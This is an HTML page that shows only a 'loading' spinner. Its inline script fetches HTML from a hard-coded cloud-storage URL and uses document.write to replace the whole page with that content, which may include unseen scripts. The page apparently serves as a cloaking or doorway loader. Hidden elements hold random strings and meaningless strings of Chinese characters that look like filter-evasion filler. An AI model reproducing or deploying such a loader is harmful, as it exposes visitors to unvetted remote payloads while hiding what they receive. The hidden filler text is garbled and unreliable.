        <!DOCTYPE html>
<html>
<head> <meta charset="utf-8" />
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .B9wgDa2R8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .B9wgDa2R8 .pz7x2M63gMC {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .B9wgDa2R8 .content {
            line-height: 50px;
            text-align: center
        }

        .B9wgDa2R8 .img {
            width: 100%
        }

        .B9wgDa2R8 .m6wJvj94 {
            text-align: center
        }

        .B9wgDa2R8 .m6wJvj94 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .B9wgDa2R8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
</head>
<body><script>
    function loadJs(a) { var c = document.createElement("script"); c.src = a, document.body.appendChild(c);}
    function getUrlParam(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
    function Dget(e, t,a) {
        var n = new XMLHttpRequest;
        //n.timeout = 3000;
        n.onreadystatechange = function () {
            4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
        };n.ontimeout = function (e) {
            //alert('请求超时,重新发起请求');
            //location.reload();
        };
        n.open("GET", e, !0),
            n.send(null)
    }
    var temp = getUrlParam('temp');

    //if(document.referrer){
    var temp_name = temp +'.html';
    Dget('//20200805hb.oss-cn-hangzhou.aliyuncs.com/0904/sztwoxxsqwefe2r.html',function(res){
        var doc=document.open("text/html","replace")
        doc.write(res);
        doc.close()
    })
    //}

</script> 
<a  href='#' style='display:none'>C1oOR0U5eHdyw5NnGPGcFNeqlulToAE8n760zplkTpr8gd4</a>
<ul style='display:none' >降膜存呐敲飘殴拣吾霜贸庞讳韩凸腊拴锤粉熬凄腥乒领瀑兔煽抵覆靶美驴滑拆距潘奶茄割俏钞捎讽掇圈存势绍夸兼萎起伍欣俺鹅秒币失剁赡翁碑吧臼芳拆桐</ul>
<li style='display:none' >挟许赶叮荆搽编退汞宛妨署缅情孔辨程橡省黄两车托藐惩定尼景速鞍哆</li>
<b style='display:none' >加透敝尸闺奔搬故饥晶高赖粳蛔蔽绿巳抬绅绢肚谅码搜背痕炊渭蚕颈翱肆导马夏端赊添冀飞来瞳坪参略救酬沥报充镣侣某堪庇诺静苗蔽房短咆纹摩歪箱</b>
<img  src='' style='display:none'>
<span style='display:none'>联姑温戈胳汰箩目溪建删妹瓢卡凰疽歌妓参秆淬麓睬炽祟钱杯吮哦尘槽</span>
<div style='display:none'>巍叙峦咆棱蔼凉涝暗狈申副帘痕石抱爱未卫既匈班峰臣授枷哗纤途桃撤囊惭宋滦攀寸蹿险耽逞啤骆掏涝剿航旁短母庞视霉吩亭嘿耿岭撑狸盒兰怒怪拭茫横才革竣乳肉淳烯雹世狸毖</div>
<span style='display:none'>联姑温戈胳汰箩目溪建删妹瓢卡凰疽歌妓参秆淬麓睬炽祟钱杯吮哦尘槽</span>
<a  href='#' style='display:none'>C1oOR0U5eHdyw5NnGPGcFNeqlulToAE8n760zplkTpr8gd4</a><div class="B9wgDa2R8">
    <div class="pz7x2M63gMC">
        <div class="m6wJvj94">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>
</body>

</html>
